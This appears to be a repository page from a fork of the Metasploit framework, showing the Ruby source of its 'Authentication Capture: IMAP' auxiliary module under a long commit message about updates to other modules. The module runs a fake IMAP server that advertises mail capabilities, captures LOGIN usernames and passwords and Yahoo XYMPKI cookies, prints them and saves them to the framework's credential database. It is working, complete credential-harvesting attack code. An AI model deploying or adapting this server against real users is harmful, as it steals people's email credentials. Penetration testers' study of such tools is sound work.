adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/modules/auxiliary/server/capture/imap.rb
T
Clément Notin 33e35bae7c Add descriptions to auxiliary modules Actions 
And a little formatting
Closes #13403

Update modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/backupexec/dump.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/android/android_stock_browser_iframe.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/tikiwiki/tikidblib.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/smb.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/telnet.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/vnc.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/fakedns.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/tftp.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/gzip_bomb_dos.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/ibm_lotus_notes.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/ibm_lotus_notes2.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/webkitplus.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/example.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/android_browser_file_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_lanipleak.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/firefox_pdfjs_file_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/samsung_browser_sop_bypass.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http_basic.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http_ntlm.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/http_ntlmrelay.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks4a.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks5.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/sip.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/postgresql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/local_hwbridge.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/webkit_xslt_dropper.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks_unc.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/client/iec104/iec104.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/drda.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/ftp.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/mssql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/mysql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/pop3.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/dns/spoofhelper.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/printjob_capture.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update description following Actions removal

Update modules/auxiliary/gather/browser_info.rb

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>
2020-05-17 14:51:14 -05:00

133 lines
3.5 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Authentication Capture: IMAP',
'Description' => %q{
This module provides a fake IMAP service that
is designed to capture authentication credentials.
},
'Author' => ['ddz', 'hdm'],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Capture', 'Description' => 'Run IMAP capture server' ]
],
'PassiveActions' =>
[
'Capture'
],
'DefaultAction' => 'Capture'
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 143 ]),
OptString.new('BANNER', [ true, "The server banner", 'IMAP4'])
])
end
def setup
super
@state = {}
end
def run
exploit()
end
def on_client_connect(c)
@state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil}
c.put "* OK #{datastore['BANNER']}\r\n"
end
def on_client_data(c)
data = c.get_once
return unless data
num, cmd, arg = data.strip.split(/\s+/, 3)
arg ||= ""
if cmd.upcase == 'CAPABILITY'
c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS " +
"MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT " +
"QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 " +
"AUTH=XYMPKI AUTH=XYMECOOKIE ID\r\n"
c.put "#{num} OK CAPABILITY completed.\r\n"
end
# Handle attempt to authenticate using Yahoo's magic cookie
# Used by iPhones and Zimbra
if cmd.upcase == 'AUTHENTICATE' && arg.upcase == 'XYMPKI'
c.put "+ \r\n"
cookie1 = c.get_once
c.put "+ \r\n"
cookie2 = c.get_once
register_creds(@state[c][:ip], cookie1, cookie2, 'imap-yahoo')
return
end
if cmd.upcase == 'LOGIN'
@state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)
register_creds(@state[c][:ip], @state[c][:user], @state[c][:pass], 'imap')
print_good("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
return
end
if cmd.upcase == 'LOGOUT'
c.put("* BYE IMAP4rev1 Server logging out\r\n")
c.put("#{num} OK LOGOUT completed\r\n")
return
end
@state[c][:pass] = data.strip
c.put "#{num} NO LOGIN FAILURE\r\n"
return
end
def on_client_close(c)
@state.delete(c)
end
def register_creds(client_ip, user, pass, service_name)
# Build service information
service_data = {
address: client_ip,
port: datastore['SRVPORT'],
service_name: service_name,
protocol: 'tcp',
workspace_id: myworkspace_id
}
# Build credential information
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: pass,
private_type: :password,
username: user,
workspace_id: myworkspace_id
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED,
workspace_id: myworkspace_id
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end
Reference in New Issue View Git Blame Copy Permalink